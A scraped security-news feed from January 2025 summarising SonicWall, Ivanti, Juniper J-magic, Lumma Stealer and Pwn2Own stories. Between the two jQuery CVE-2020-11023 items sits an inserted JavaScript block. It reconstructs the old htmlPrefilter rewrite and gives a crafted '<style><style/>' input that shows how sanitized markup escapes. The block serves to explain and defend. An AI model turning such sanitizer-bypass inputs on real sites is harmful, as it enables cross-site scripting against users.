    2025-01-24 https://www.bleepingcomputer.com/news/security/microsoft-outdated-exchange-servers-fail-to-auto-mitigate-security-bugs/
    Microsoft says outdated Exchange servers cannot receive new emergency mitigation definitions because an Office Configuration Service certificate type is being deprecated. [...] "

    Autosummary: "


    Hackers get $886,250 for 49 zero-days at Pwn2Own Automotive 2025

    exploits industry
    2025-01-24 https://www.bleepingcomputer.com/news/security/hackers-get-886-250-for-49-zero-days-at-pwn2own-automotive-2025/
    ​The Pwn2Own Automotive 2025 hacking contest has ended with security researchers collecting $886,250 after exploiting 49 zero-days. [...] "

    Autosummary: "


    Hacker infects 18,000 "script kiddies" with fake malware builder

    exploits
    2025-01-24 https://www.bleepingcomputer.com/news/security/hacker-infects-18-000-script-kiddies-with-fake-malware-builder/
    A threat actor targeted low-skilled hackers, known as "script kiddies," with a fake malware builder that secretly infected them with a backdoor to steal data and take over computers. [...] "

    Autosummary: Out of the 56 commands supported in total, the following are particularly dangerous: /machine_id*browsers – steal saved passwords, cookies, and autofill data from web browsers; /machine_id*keylogger – record everything the victim types on their computer; /machine_id*desktop – capture the victim’s active screen; /machine_id*encrypt*<password> – encrypt all files on the system using a provided password; /machine_id*processkill*<process> – terminate specific running processes, including security software; /machine_id*upload*<file> – "


    Texas scrutinizes four more car manufacturers on privacy issues

    industry
    2025-01-24 https://www.malwarebytes.com/blog/news/2025/01/texas-scrutinizes-four-more-car-manufacturers-on-privacy-issues
    The Texas Attorney General has requested information of four more car manufacturers about their data handling. "

    Autosummary: The car manufacturers involved in that complaint are Toyota, Lexus, Mazda, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram. "


    J-magic malware campaign targets Juniper routers

    exploits
    2025-01-24 https://securityaffairs.com/173408/security/j-magic-malware-campaign-targets-juniper-routers.html
    Threat actors are targeting Juniper routers with a custom backdoor in a campaign code-named “J-magic”; the backdoor stays dormant until it sees a so-called “magic packet” in the traffic it monitors. Lumen Technologies researchers reported that the J-magic campaign targets Juniper routers with a custom backdoor using a passive agent based on the cd00r variant (an open-source backdoor by fx). It activates upon detecting […] "

    Autosummary: J-magic malware campaign targets Juniper routers (Pierluigi Paganini, January 24, 2025). Threat actors are targeting Juniper routers with a custom backdoor in a campaign code-named “J-magic”, which activates only on a “magic packet” in the monitored traffic. "


    U.S. CISA adds SonicWall SMA1000 flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-01-24 https://securityaffairs.com/173417/security/u-s-cisa-adds-sonicwall-sma1000-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SonicWall SMA1000 vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC) vulnerability, tracked as CVE-2025-23006 to its Known Exploited Vulnerabilities (KEV) catalog. This week, SonicWall warned customers of a critical […] "

    Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC) vulnerability, tracked as CVE-2025-23006 to its Known Exploited Vulnerabilities (KEV) catalog. "


    Funding soars in a milestone year for Israeli cybersecurity

    ciber
    2025-01-23 https://www.helpnetsecurity.com/2025/01/23/israeli-cybersecurity-funding-2024-video/

    In this Help Net Security video, Or Salom, Analyst at YL Ventures, discusses the State of the Cyber Nation Report 2024. The report reveals resilience and growth in the Israeli cybersecurity industry, with total investments reaching $4 billion across 89 funding rounds—more than double the $1.89 billion raised in 2023. Key highlights: Record-breaking seed activity: 50 seed rounds in 2024 with total seed funding reaching $400M, demonstrating sustained confidence in early-stage Israeli cybersecurity innovation. Explosive … More

    The post Funding soars in a milestone year for Israeli cybersecurity appeared first on Help Net Security.

    "

    Autosummary: "


    Web Cache Vulnerability Scanner: Open-source tool for detecting web cache poisoning

    exploits
    2025-01-23 https://www.helpnetsecurity.com/2025/01/23/web-cache-vulnerability-scanner-detecting-web-cache-poisoning/

    The Web Cache Vulnerability Scanner (WCVS) is an open-source command-line tool for detecting web cache poisoning and deception. The scanner, developed by Maximilian Hildebrand, offers extensive support for various web cache poisoning and deception techniques. It features a built-in crawler to discover additional URLs for testing. The tool is designed to adapt to specific web caches for enhanced testing efficiency, is customizable, and integrates into existing CI/CD pipelines. Features Analyzing a web cache before testing … More

    The post Web Cache Vulnerability Scanner: Open-source tool for detecting web cache poisoning appeared first on Help Net Security.

    "

    Autosummary: "


    TRIPLESTRENGTH Hits Cloud for Cryptojacking, On-Premises Systems for Ransomware

    exploits ransomware
    2025-01-23 https://thehackernews.com/2025/01/triplestrength-targets-cloud-platforms.html
    Google on Wednesday shed light on a financially motivated threat actor named TRIPLESTRENGTH for its opportunistic targeting of cloud environments for cryptojacking and on-premise ransomware attacks. "This actor engaged in a variety of threat activity, including cryptocurrency mining operations on hijacked cloud resources and ransomware activity," the tech giant's cloud division said in its 11th "

    Autosummary: "


    Appdome Threat Dynamics analyzes and ranks mobile threats

    industry
    2025-01-23 https://www.helpnetsecurity.com/2025/01/23/appdome-threat-dynamics/

    Appdome announced that a new AI-Native threat-management module called Threat Dynamics will be offered inside Appdome’s ThreatScope Mobile XDR. Threat Dynamics uses AI deep learning to continuously evaluate the likelihood of a successful exploit from more than 400+ attack vectors and calculate a Mobile Risk Index for each business and mobile application. This allows businesses to see how threats move across the production environment, empowering them to quickly prioritize and focus on the attack vectors … More

    The post Appdome Threat Dynamics analyzes and ranks mobile threats appeared first on Help Net Security.

    "

    Autosummary: Trends such as Infection Rate, Attack Frequency, Attack Velocity, Cohort Placement, Variance, Projected Impact, and more are provided for each attack, application, release, device, OS, geographic source, and other dimensions. By analyzing this data from multiple perspectives, mobile businesses can see how cyber-attacks, fraud, and threats move across the mobile business and use Appdome’s Threat Dynamics to identify fraud and cyber-attack patterns early on, rank the potential impact of each attack prospectively, and preempt cyber-attacks, fraud, and threats before the attacks proliferate. "


    SonicWall SMA appliances exploited in zero-day attacks (CVE-2025-23006)

    exploits
    2025-01-23 https://www.helpnetsecurity.com/2025/01/23/sonicwall-sma-1000-exploited-zero-day-cve-2025-23006/

    A critical zero-day vulnerability (CVE-2025-23006) affecting SonicWall Secure Mobile Access (SMA) 1000 Series appliances is being exploited by attackers. “We strongly advise users of the SMA1000 product to upgrade to the hotfix release version to address the vulnerability,” the company said on Wednesday. About CVE-2025-23006 SonicWall Secure Mobile Access (SMA) is a unified secure access gateway used by organizations to provide employees access to applications from anywhere. The SMA 1000 series of appliances is aimed … More

    The post SonicWall SMA appliances exploited in zero-day attacks (CVE-2025-23006) appeared first on Help Net Security.

    "

    Autosummary: "


    SonicWall Urges Immediate Patch for Critical CVE-2025-23006 Flaw Amid Likely Exploitation

    exploits
    2025-01-23 https://thehackernews.com/2025/01/sonicwall-urges-immediate-patch-for.html
    SonicWall is alerting customers of a critical security flaw impacting its Secure Mobile Access (SMA) 1000 Series appliances that it said has been likely exploited in the wild as a zero-day. The vulnerability, tracked as CVE-2025-23006, is rated 9.8 out of a maximum of 10.0 on the CVSS scoring system. "Pre-authentication deserialization of untrusted data vulnerability has been identified in the "

    Autosummary: "


    New Research: The State of Web Exposure 2025

    government
    2025-01-23 https://thehackernews.com/2025/01/new-research-state-of-web-exposure-2025.html
    Are your websites leaking sensitive data? New research reveals that 45% of third-party apps access user info without proper authorization, and 53% of risk exposures in Retail are due to the excessive use of tracking tools. Learn how to uncover and mitigate these hidden threats and risks—download the full report here. New research by web exposure management specialist Reflectiz reveals several "

    Autosummary: Tracking Technologies That said, even well-established third-party apps can increase an organization's level of web exposure, particularly tracking apps, as the chart below shows: The Facebook and TikTok pixels, for example, have been known to collect private user information after being misconfigured. It analyzes the huge number of data points it gathers from scanning millions of websites by considering each risk factor in context, adds them together to create an overall level of risk, and expresses this as a simple grade, from A to F, with added remediation advice. If you aren't familiar with the term web exposure, it was coined by Gartner to describe the range of risks that modern websites face because they connect with dozens of essential third-party apps, CDN repositories, and open source tools that help with tracking and functionality tasks. "


    QakBot-Linked BC Malware Adds Enhanced Remote Access and Data Gathering Features

    exploits
    2025-01-23 https://thehackernews.com/2025/01/qakbot-linked-bc-malware-adds-enhanced.html
    Cybersecurity researchers have disclosed details of a new BackConnect (BC) malware that has been developed by threat actors linked to the infamous QakBot loader. "BackConnect is a common feature or module utilized by threat actors to maintain persistence and perform tasks," Walmart's Cyber Intelligence team told The Hacker News. "The BackConnect(s) in use were "DarkVNC" alongside the IcedID "

    Autosummary: " The BC malware has also been the subject of an independent analysis by Sophos, which attributed the artifacts to a threat cluster it tracks as STAC5777, which, in turn, overlaps with Storm-1811, a cybercriminal group known for abusing Quick Assist for Black Basta ransomware deployment by posing as tech support personnel. "


    Cisco addresses a critical privilege escalation bug in Meeting Management

    exploits
    2025-01-23 https://securityaffairs.com/173361/security/cisco-meeting-management-critical-flaw.html
    Cisco addressed a critical flaw in its Meeting Management that could allow an attacker to gain administrator privileges on vulnerable instances. Cisco released security updates to fix a critical flaw, tracked as CVE-2025-20156 (CVSS score of 9.9), affecting its Meeting Management. A remote, authenticated attacker can exploit the vulnerability to gain administrator privileges on affected instances. […] "

    Autosummary: Cisco addresses a critical privilege escalation bug in Meeting Management (Pierluigi Paganini, January 23, 2025). Cisco addressed a critical flaw in its Meeting Management that could allow a remote, authenticated attacker to gain administrator privileges on vulnerable instances. "


    SonicWall warns of SMA1000 RCE flaw exploited in zero-day attacks

    exploits
    2025-01-23 https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-sma1000-rce-flaw-exploited-in-zero-day-attacks/
    SonicWall is warning about a pre-authentication deserialization vulnerability in SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC), with reports that it has been exploited as a zero-day in attacks. [...] "

    Autosummary: Yesterday, Bishop Fox researchers published a video showcasing their exploit of CVE-2024-53704, promising to disclose the complete details on February 10, 2025. "


    Stealthy "Magic Packet" malware targets Juniper VPN gateways

    exploits
    2025-01-23 https://www.bleepingcomputer.com/news/security/stealthy-magic-packet-malware-targets-juniper-vpn-gateways/
    A malicious campaign has been specifically targeting Juniper edge devices, many acting as VPN gateways, with malware dubbed J-magic that starts a reverse shell only if it detects a "magic packet" in the network traffic. [...] "

    Autosummary: “We suspect that the developer has added this RSA challenge to prevent other threat actors from spraying the internet with magic packets to enumerate victims and then simply repurposing the J-Magic agents for their own purposes” - Black Lotus Labs. Although the activity shares technical similarities with the SeaSpy malware, also based on the cd00r backdoor, some differences make it difficult to establish a connection between the two campaigns. "


    Cisco fixes ClamAV vulnerability with available PoC and critical Meeting Management flaw

    exploits
    2025-01-23 https://www.helpnetsecurity.com/2025/01/23/cisco-clamav-cve-2025-20128-meeting-management-cve-2025-20156/

    Cisco has released patches for a critical privilege escalation vulnerability in Meeting Management (CVE-2025-20156) and a heap-based buffer overflow flaw (CVE-2025-20128) that, when triggered, could terminate the ClamAV scanning process on endpoints running a Cisco Secure Endpoint Connector. Proof-of-concept (PoC) exploit code for CVE-2025-20128 is available, Cisco said, but the company is not aware of the vulnerability being exploited in the wild. Credit for reporting the flaw has been given to OSS-Fuzz, Google’s continuous fuzzing … More

    The post Cisco fixes ClamAV vulnerability with available PoC and critical Meeting Management flaw appeared first on Help Net Security.

    "

    Autosummary: The company has confirmed that its Secure Email Gateways and Secure Web Appliances are unaffected, but Cisco Secure Endpoint Connectors for Windows, Linux and macOS – distributed from Cisco Secure Endpoint Private Cloud – are, and all of them should be upgraded to a fixed release: 7.5.20 or 8.4.31 (for Windows), 1.25.1 (for Linux), 1.24.4 (for macOS). "


    Palo Alto Firewalls Found Vulnerable to Secure Boot Bypass and Firmware Exploits

    exploits
    2025-01-23 https://thehackernews.com/2025/01/palo-alto-firewalls-found-vulnerable-to.html
    An exhaustive evaluation of three firewall models from Palo Alto Networks has uncovered a host of known security flaws impacting the devices' firmware as well as misconfigured security features. "These weren't obscure, corner-case vulnerabilities," security vendor Eclypsium said in a report shared with The Hacker News. "Instead these were very well-known issues that we wouldn't expect to see "

    Autosummary: "


    Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks

    industry
    2025-01-23 https://thehackernews.com/2025/01/beware-fake-captcha-campaign-spreads.html
    Cybersecurity researchers are calling attention to a new malware campaign that leverages fake CAPTCHA verification checks to deliver the infamous Lumma information stealer. "The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at "

    Autosummary: "The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at Netskope Threat Labs, said in a report shared with The Hacker News. "


    Experts Find Shared Codebase Linking Morpheus and HellCat Ransomware Payloads

    exploits ransomware
    2025-01-23 https://thehackernews.com/2025/01/experts-find-shared-codebase-linking.html
    An analysis of HellCat and Morpheus ransomware operations has revealed that affiliates associated with the respective cybercrime entities are using identical code for their ransomware payloads. The findings come from SentinelOne, which analyzed artifacts uploaded to the VirusTotal malware scanning platform by the same submitter towards the end of December 2024. "These two payload samples are "

    Autosummary: They are both configured to exclude the \Windows\System32 folder, as well as a hard-coded list of extensions, namely .dll, .sys, .exe, .drv, .com, and .cat, from the encryption process. "


    Chinese threat actors used two advanced exploit chains to hack Ivanti CSA

    exploits
    2025-01-23 https://securityaffairs.com/173369/hacking/chinese-threat-actors-hack-ivanti-csa.html
    US agencies revealed Chinese threat actors used two advanced exploit chains to breach Ivanti Cloud Service Appliances (CSA). The US government’s cybersecurity and law enforcement agencies revealed that Chinese threat actors used at least two sophisticated exploit chains to compromise Ivanti Cloud Service Appliances (CSA). CISA and the FBI published a joint advisory warning that Chinese hackers […] "

    Autosummary: CISA and the FBI published a joint advisory warning that Chinese hackers exploited four Ivanti flaws (CVE-2024-8963, CVE-2024-9379, CVE-2024-8190, CVE-2024-9380) to achieve remote code execution, steal credentials, and deploy webshells. "


    Hundreds of fake Reddit sites push Lumma Stealer malware

    exploits
    2025-01-23 https://www.bleepingcomputer.com/news/security/hundreds-of-fake-reddit-sites-push-lumma-stealer-malware/
    Hackers are distributing close to 1,000 web pages mimicking Reddit and the WeTransfer file sharing service that lead to downloading the Lumma Stealer malware. [...] "

    Autosummary: Most recently, infostealers enabled high-impact attacks on PowerSchool, HotTopic, CircleCI, and Snowflake. "


    CISA: Hackers still exploiting older Ivanti bugs to breach networks

    exploits
    2025-01-23 https://www.bleepingcomputer.com/news/security/cisa-hackers-still-exploiting-older-ivanti-bugs-to-breach-networks/
    CISA and the FBI warned today that attackers are still exploiting Ivanti Cloud Service Appliances (CSA) security flaws patched since September to breach vulnerable networks. [...] "

    Autosummary: CISA added them to its Known Exploited Vulnerabilities Catalog and ordered Federal Civilian Executive Branch (FCEB) agencies to secure their appliances as mandated by Binding Operational Directive (BOD) 22-01. "According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks," the U.S. cybersecurity agency said on Wednesday. "


    Juniper enterprise routers backdoored via “magic packet” malware

    exploits
    2025-01-23 https://www.helpnetsecurity.com/2025/01/23/juniper-enterprise-routers-backdoor-malware-j-magic/

    A stealthy attack campaign turned Juniper enterprise-grade routers into entry points to corporate networks via the “J-magic” backdoor, which is loaded into the devices’ memory and spawns a reverse shell when instructed to do so. “Our telemetry indicates the J-magic campaign was active from mid-2023 until at least mid-2024; in that time, we observed targets in the semiconductor, energy, manufacturing, and IT verticals among others,” Lumen’s Black Lotus Labs team researchers shared. The J-magic malware … More

    The post Juniper enterprise routers backdoored via “magic packet” malware appeared first on Help Net Security.

    "

    Autosummary: “Our telemetry indicates the J-magic campaign was active from mid-2023 until at least mid-2024; in that time, we observed targets in the semiconductor, energy, manufacturing, and IT verticals among others,” Lumen’s Black Lotus Labs team researchers shared. "


    Custom Backdoor Exploiting Magic Packet Vulnerability in Juniper Routers

    exploits
    2025-01-23 https://thehackernews.com/2025/01/custom-backdoor-exploiting-magic-packet.html
    Enterprise-grade Juniper Networks routers have become the target of a custom backdoor as part of a campaign dubbed J-magic. According to the Black Lotus Labs team at Lumen Technologies, the activity is so named for the fact that the backdoor continuously monitors for a "magic packet" sent by the threat actor in TCP traffic.  "J-magic campaign marks the rare occasion of malware designed "

    Autosummary: Infections have been reported across Europe, Asia, and South America, including Argentina, Armenia, Brazil, Chile, Colombia, Indonesia, the Netherlands, Norway, Peru, the U.K., the U.S., and Venezuela. "


    U.S. CISA adds JQuery flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-01-23 https://securityaffairs.com/173388/uncategorized/u-s-cisa-adds-jquery-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds jQuery vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a jQuery persistent cross-site scripting (XSS) vulnerability, tracked as CVE-2020-11023 (CVSS score: 6.9), to its Known Exploited Vulnerabilities (KEV) catalog. In jQuery 1.0.3 to 3.4.1, using DOM methods with untrusted HTML containing […] "

    Autosummary: “Passing HTML containing <option> elements from untrusted sources – even after sanitizing them – to one of jQuery’s DOM manipulation methods (i.e. .html() , .append() , and others) may execute untrusted code.” reads the advisory. "


    Pwn2Own Automotive 2025 Day 2: organizers awarded $335,500

    industry
    2025-01-23 https://securityaffairs.com/173376/hacking/pwn2own-automotive-2025-day-2.html
    Bug hunters earned $129,000 for Tesla charger exploits and over $700,000 total in two days at Pwn2Own Automotive 2025. During Day 2 of Pwn2Own Automotive 2025 organizers awarded $335,500, which brings the event total to $718,250. So far, the researchers have demonstrated 39 unique zero-days. The team SinSinology leads the Master of Pwn chart. Sina […] "

    Autosummary: Pwn2Own Automotive 2025 Day 2: organizers awarded $335,500 (Pierluigi Paganini, January 23, 2025). Bug hunters earned $129,000 for Tesla charger exploits and over $700,000 total in two days at Pwn2Own Automotive 2025. "


    U.S. CISA adds JQuery flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-01-23 https://securityaffairs.com/173388/breaking-news/u-s-cisa-adds-jquery-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds jQuery vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a jQuery persistent cross-site scripting (XSS) vulnerability, tracked as CVE-2020-11023 (CVSS score: 6.9), to its Known Exploited Vulnerabilities (KEV) catalog. In jQuery 1.0.3 to 3.4.1, using DOM methods with untrusted HTML containing […] "

    Autosummary: “Passing HTML containing <option> elements from untrusted sources – even after sanitizing them – to one of jQuery’s DOM manipulation methods (i.e. .html() , .append() , and others) may execute untrusted code.” reads the advisory. "
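    Both jQuery items above quote the advisory's warning (untrusted HTML passed to .html(), .append() and similar methods may execute code even after sanitizing) without showing why sanitizing does not help. The following is an added example, not jQuery's code and not from either article: it reproduces the self-closing-tag rewrite that jQuery.htmlPrefilter applied before 3.5.0 (the regular expression is reconstructed from the jQuery 3.4.1 source and is an assumption of this example), places it beside the identity prefilter that 3.5.0 ships, and adds a check for the security-relevant effect: an end tag for a raw-text element that the sanitized input never contained appears in the string jQuery actually parses, so markup a sanitizer judged inert is lifted out of that element. The page's CVE is the <option>-specific variant of this class; the rewrite shown here is the general mechanism. Names such as introducesEndTag and the sample input are this example's own.

```javascript
// Self-closing-tag rewrite applied by jQuery.htmlPrefilter before 3.5.0.
// Regex reconstructed from jQuery 3.4.1 (assumption of this example, not quoted from the page).
const LEGACY_RXHTMLTAG =
  /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi;

// jQuery < 3.5.0: "<x/>" becomes "<x></x>" before the string reaches the HTML parser.
function legacyHtmlPrefilter(html) {
  return html.replace(LEGACY_RXHTMLTAG, "<$1></$2>");
}

// jQuery >= 3.5.0: the string is parsed exactly as given. For code stuck on an
// older release this is also the documented override:
//   jQuery.htmlPrefilter = function (html) { return html; };
function fixedHtmlPrefilter(html) {
  return html;
}

// Elements whose content the HTML parser treats as raw text or RCDATA. An end
// tag for one of these that the sanitized input did not contain, but the
// prefiltered string does, means everything after it is no longer inside that
// element when jQuery parses it, so the sanitizer's view no longer matches.
const RAW_TEXT_TAGS = ["style", "script", "textarea", "title"];

function introducesEndTag(before, after) {
  return RAW_TEXT_TAGS.filter((tag) => {
    const endTag = new RegExp(`</${tag}\\s*>`, "i");
    return !endTag.test(before) && endTag.test(after);
  });
}

// Run both prefilters over one input and report whether each one lets markup
// escape a raw-text context.
function compare(html) {
  const legacy = legacyHtmlPrefilter(html);
  const fixed = fixedHtmlPrefilter(html);
  return {
    legacy,
    fixed,
    legacyEscapes: introducesEndTag(html, legacy),
    fixedEscapes: introducesEndTag(html, fixed),
  };
}

// Constructed input (not from the advisory). Parsed as written, the <b> element
// is just text inside <style>; after the legacy rewrite "<style/>" becomes
// "<style></style>", the style element closes early and <b> becomes a real element.
const SAMPLE_INPUT = "<style><style/><b>now parsed as an element</b>";
```

    The same property holds for any payload a sanitizer passed because it sat inside a raw-text element; for untrusted strings the safe call in every jQuery version is .text(), which never parses markup. Upgrading to 3.5.0 or later removes the rewrite entirely.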


    Cybersecurity books on ransomware you shouldn’t miss

    exploits ransomware ciber
    2025-01-22 https://www.helpnetsecurity.com/2025/01/22/ransomware-cybersecurity-books/

    This list of ransomware-focused cybersecurity books is tailored for professionals seeking practical insights and deeper knowledge. Covering technical strategies, real-world cases, and the evolving tactics of attackers, these books offer valuable perspectives to help strengthen defenses and refine incident response plans. Ransomware and Cyber Extortion: Response and Prevention Authors: Karen Sprenger, Sherri Davidoff, and Matt Durrin This guide offers value to everyone involved in prevention, response, planning, or policy: CIOs, CISOs, incident responders, investigators, negotiators, … More

    The post Cybersecurity books on ransomware you shouldn’t miss appeared first on Help Net Security.

    "

    Autosummary: "


    Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT Devices

    industry
    2025-01-22 https://thehackernews.com/2025/01/mirai-botnet-launches-record-56-tbps.html
    Web infrastructure and security company Cloudflare on Tuesday said it detected and blocked a 5.6 Terabit per second (Tbps) distributed denial-of-service (DDoS) attack, the largest ever attack to be reported to date. The UDP protocol-based attack took place on October 29, 2024, targeting one of its customers, an unnamed internet service provider (ISP) from Eastern Asia. The activity originated "

    Autosummary: "


    A 7-Zip bug allows attackers to bypass the Mark of the Web (MotW) feature

    exploits
    2025-01-22 https://securityaffairs.com/173310/hacking/7-zip-flaw-bypass-the-mark-of-the-web-motw.html
    A vulnerability in the 7-Zip file software allows attackers to bypass the Mark of the Web (MotW) Windows security feature. Attackers can exploit a vulnerability, tracked as CVE-2025-0411, in the free, open-source file archiver software 7-Zip to bypass the Mark of the Web (MotW) Windows security feature. Mark of the Web (MotW) is a security […] "

    Autosummary: When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. "


    Colombian soldiers deployed to quell deadly rebel violence

    latam
    2025-01-22 https://www.bbc.com/news/articles/c7vd7njv4zzo
    At least 80 civilians have been killed amid a surge of violence between rival rebel groups. "

    Autosummary: Thousands of people have sought shelter in a sports stadium in the city of Cúcuta Investigative news programme Noticias Uno said it had seen a military intelligence report which suggested that the surge in violence between the two rival groups had been triggered by "the loss of a multi-million-dollar cocaine shipment in November 2024". "


    IPany VPN breached in supply-chain attack to push custom malware

    exploits
    2025-01-22 https://www.bleepingcomputer.com/news/security/ipany-vpn-breached-in-supply-chain-attack-to-push-custom-malware/
    South Korean VPN provider IPany was breached in a supply chain attack by the "PlushDaemon" China-aligned hacking group, who compromised the company's VPN installer to deploy the custom "SlowStepper" malware. [...] "

    Autosummary: – Gathers a variety of system details, including CPU brand, HDD serial numbers, computer and hostname, public IP address, running processes, installed applications, network interfaces, system memory, webcam, and microphone status, and whether the OS is running in a virtual machine. "


    Hackers exploit 16 zero-days on first day of Pwn2Own Automotive 2025

    exploits industry
    2025-01-22 https://www.bleepingcomputer.com/news/security/hackers-exploit-16-zero-days-on-first-day-of-pwn2own-automotive-2025/
    On the first day of Pwn2Own Automotive 2025, security researchers exploited 16 unique zero-days and collected $382,750 in cash awards. [...] "

    Autosummary: Synacktiv Team is in third place on the leaderboard and took home $57,500 after successfully demoing a bug in the OCPP protocol to hack the ChargePoint Home Flex (Model CPH50) using signal manipulation through the connector. Security researchers from PHP Hooligans also successfully hacked a fully patched Autel charger using a heap-based buffer overflow and earned $50,000, while the Viettel Cyber Security team collected $20,000 after obtaining code execution on the Kenwood In-Vehicle Infotainment (IVI) using an OS command injection zero-day. "


    7-Zip bug could allow a bypass of a Windows security feature. Update now

    exploits
    2025-01-22 https://www.malwarebytes.com/blog/news/2025/01/7-zip-bug-could-allow-a-bypass-of-a-windows-security-feature-update-now
    A vulnerability in 7-Zip that could allow attackers to bypass the MotW security feature in Windows has been patched. "

    Autosummary: 7-Zip does not have an auto-update function, so you will have to download the version that is suitable for your system from the 7-Zip downloads page. "


    Hackers Exploit Zero-Day in cnPilot Routers to Deploy AIRASHI DDoS Botnet

    exploits
    2025-01-22 https://thehackernews.com/2025/01/hackers-exploit-zero-day-in-cnpilot.html
    Threat actors are exploiting an unspecified zero-day vulnerability in Cambium Networks cnPilot routers to deploy a variant of the AISURU botnet called AIRASHI to carry out distributed denial-of-service (DDoS) attacks. According to QiAnXin XLab, the attacks have leveraged the security flaw since June 2024. Additional details about the shortcomings have been withheld to prevent further abuse. Some "

    Autosummary: Some of the other flaws weaponized by the distributed denial-of-service (DDoS) botnet include CVE-2013-3307, CVE-2016-20016, CVE-2017-5259, CVE-2018-14558, CVE-2020-25499, CVE-2020-8515, CVE-2022-3573, CVE-2022-40005, CVE-2022-44149, CVE-2023-28771, as well as those impacting AVTECH IP cameras, LILIN DVRs, and Shenzhen TVT devices. "


    Cisco warns of denial of service flaw with PoC exploit code

    exploits
    2025-01-22 https://www.bleepingcomputer.com/news/security/cisco-warns-of-denial-of-service-flaw-with-poc-exploit-code/
    Cisco has released security updates to patch a ClamAV denial-of-service (DoS) vulnerability, which has proof-of-concept (PoC) exploit code. [...] "

    Autosummary: "


    Conduent confirms cybersecurity incident behind recent outage

    ciber
    2025-01-22 https://www.bleepingcomputer.com/news/security/conduent-confirms-cybersecurity-incident-behind-recent-outage/
    American business services giant and government contractor Conduent confirmed today that a recent outage resulted from what it described as a "cyber security incident." [...] "

    Autosummary: " However, one day later, after being asked to confirm if a cyberattack caused the outage, Conduent sent an updated statement saying the "operational disruption" was caused by "a cyber security incident. "


    Trump Terminates DHS Advisory Committee Memberships, Disrupting Cybersecurity Review

    ciber
    2025-01-22 https://thehackernews.com/2025/01/trump-terminates-dhs-advisory-committee.html
    The new Trump administration has terminated all memberships of advisory committees that report to the Department of Homeland Security (DHS).  "In alignment with the Department of Homeland Security's (DHS) commitment to eliminating the misuse of resources and ensuring that DHS activities prioritize our national security, I am directing the termination of all current memberships on advisory "

    Autosummary: "In alignment with the Department of Homeland Security's (DHS) commitment to eliminating the misuse of resources and ensuring that DHS activities prioritize our national security, I am directing the termination of all current memberships on advisory committees within DHS, effective immediately," Acting Secretary Benjamine C. Huffman said in a January 20, 2025, memo. "


    Does China "operate" Panama Canal, as Trump says?

    latam
    2025-01-22 https://www.bbc.com/news/articles/c1km4vj3pl0o
    The US president says the US should "take back" the famous waterway because China runs it now. "

    Autosummary: This "package of Chinese activities", as described by Mr Thomas, might have prompted Trump's assertion that the canal is "owned" by China, but operation of those ports does not equate to ownership, he stresses. On Christmas Day, Trump posted on social media that the "wonderful soldiers of China" were "lovingly, but illegally, operating the Panama Canal" - a claim which was swiftly denied by officials in Panama City and Beijing. "


    Critical zero-days impact premium WordPress real estate plugins

    exploits government
    2025-01-22 https://www.bleepingcomputer.com/news/security/critical-zero-days-impact-premium-wordpress-real-estate-plugins/
    The RealHome theme and the Easy Real Estate plugins for WordPress are vulnerable to two critical severity flaws that allow unauthenticated users to gain administrative privileges. [...] "

    Autosummary: Once registered as an administrator, the attacker can subsequently gain full control of the WordPress site, including performing content manipulation, planting scripts, and accessing user or other sensitive data. "


    Pwn2Own Automotive 2025 Day 1: organizers awarded $382,750 for 16 zero-days

    exploits industry
    2025-01-22 https://securityaffairs.com/173344/hacking/pwn2own-automotive-2025-day-1.html
    Trend Micro’s Zero Day Initiative (ZDI) announced that over $380,000 was awarded on Day 1 of Pwn2Own Automotive 2025, a hacking contest that was held in Tokyo. In total, the organizers awarded $382,750 for 16 unique working […] "

    Autosummary: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) received the biggest reward, $50,000 and 5 Master of Pwn points, for demonstrating a hard-coded cryptographic key bug in the Ubiquiti charger. "


    Two ransomware groups abuse Microsoft’s Office 365 platform to gain access to target organizations

    exploits ransomware
    2025-01-22 https://securityaffairs.com/173328/cyber-crime/ransomware-groups-abuse-microsofts-office-365-platform.html
    Two ransomware groups are exploiting Microsoft 365 services and default settings to target internal enterprise users. Sophos researchers started investigating two distinct clusters of activity, tracked as STAC5143 and STAC5777, in response to customer ransomware attacks in November and December 2024. Threat actors used their own Microsoft 365 tenants and exploited a default Teams setting allowing […] "

    Autosummary: Once access was established, the attacker used a web browser to download a malicious payload, which was split into parts, reassembled, and unpacked to deploy malware. Two ransomware groups are exploiting Microsoft 365 services and default settings to target internal enterprise users. "


    1,500 active-duty troops headed to US-Mexico border

    latam
    2025-01-22 https://www.bbc.com/news/articles/cpwx7qeeyleo
    The new administration has also halted all refugee travel and processing, leaving thousands stranded as they wait to come to the US. "

